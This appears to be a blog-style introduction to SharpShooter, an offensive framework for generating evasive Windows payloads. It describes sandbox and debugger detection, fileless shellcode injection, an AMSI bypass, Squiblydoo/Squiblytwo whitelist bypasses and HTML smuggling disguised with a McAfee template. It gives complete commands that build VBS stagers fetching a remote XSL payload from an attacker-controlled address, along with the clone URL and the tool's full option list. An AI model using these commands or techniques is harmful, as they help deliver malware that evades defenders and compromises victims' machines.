Increased use of PowerShell attacks led to the fact that they are much better logged and detected today. Yes, PowerShell is flexible, but we needed urgent alternatives. Everyone started to turn to C# and the .NET utilities to execute code on Windows. That’s how SharpShooter, payload generation framework, came out.
SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.
Payload Generation Framework: SharpShooter
- HTA, JS, VBS, JSE, VBA, VBE and WSF.
Sandbox Detection: several default techniques to evade detection, including identifying tools
Stageless Execution: with ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode
XSL Exploitation: (Squiblytwo) bypasses signatures and security solutions by executing XSL (eXtensible Stylesheet Language) full trust scripts from the WMIC command line
Squiblydoo and Squiblytwosupport: COM Staging and XSL Exploitation directly through COM
AMSI Bypass: uses XPath expression on the XSL file to bypass Windows Defender AMSI signature
Since SharpShooter has several default techniques to evade detection, including identifying tools, you can choose some or all of them. The payload will not execute if the conditions of the selected sandbox detection techniques are met.
Key to Domain: the payload will only execute on a specific domain;
Ensure Domain Joined: will only execute if the workstation is domain joined;
Check for Sandbox Artifacts: search the file system for artifacts of known sandbox technologies and virtualisation systems, if found the payload will not execute;
Check for Bad MACs: check the MAC address of the system, if the vendor matches known virtualisation software it will not execute;
Check for Debugging: if the payload is being debugged, it will not execute.
SharpShooter supports both staged and stageless payload execution. With ability to inject an in-memory shellcode directly into the process, this framework supports full fileless mode.
Squiblydoo and Squiblytwo
Sharpshooter supports Squiblydoo and SquiblyTwo attacks.
- One-liners using a COM interface (COM Staging):
Sharpshooter would now create either a XSL or SCT hosted payload, and the script based payload would be a COM stager in either HTA, VBS, JS, WSF or similar formats, to execute either
The following command will generate this with SharpShooter:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook -awl wmic --awlurl http://192.168.2.8:8080/foo.xsl
- XSL Exploitation directly through COM
The benefit of this technique is that you’re able to somewhat avoid some of the indicators associated with the wmic.exe and regsvr32.exe techniques, in particular there is no risk of being detected through command-line logging.
This technique can be used by running:
python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x64payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
Clone it from the github:
git clone https://github.com/mdsecactivebreach/SharpShooter.git
To see available options, methods and techniques, just type
usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>] [--awl <awl>] [--awlurl <awlurl>] [--payload <format>] [--sandbox <types>] [--amsi <amsi>] [--delivery <type>] [--rawscfile <path>] [--shellcode] [--scfile <path>] [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>] [--web <web>] [--dns <dns>] [--output <output>] [--smuggle] [--template <tpl>] optional arguments: -h, --help show this help message and exit --stageless Create a stageless payload --dotnetver <ver> Target .NET Version: 2 or 4 --com <com> COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote --awl <awl> Application Whitelist Bypass Technique: wmic, regsvr32 --awlurl <awlurl> URL to retrieve XSL/SCT payload --payload <format> Payload type: hta, js, jse, vba, vbe, vbs, wsf --sandbox <types> Anti-sandbox techniques:  Key to Domain (e.g. 1=CONTOSO)  Ensure Domain Joined  Check for Sandbox Artifacts  Check for Bad MACs  Check for Debugging --amsi <amsi> Use amsi bypass technique: amsienable --delivery <type> Delivery method: web, dns, both --rawscfile <path> Path to raw shellcode file for stageless payloads --shellcode Use built in shellcode execution --scfile <path> Path to shellcode file as CSharp byte array --refs <refs> References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll --namespace <ns> Namespace for custom CSharp, e.g. Foo.bar --entrypoint <ep> Method to execute, e.g. Main --web <web> URI for web delivery --dns <dns> Domain for DNS delivery --output <output> Name of output file (e.g. maldoc) --smuggle Smuggle file inside HTML --template <tpl> Name of template file (e.g. mcafee)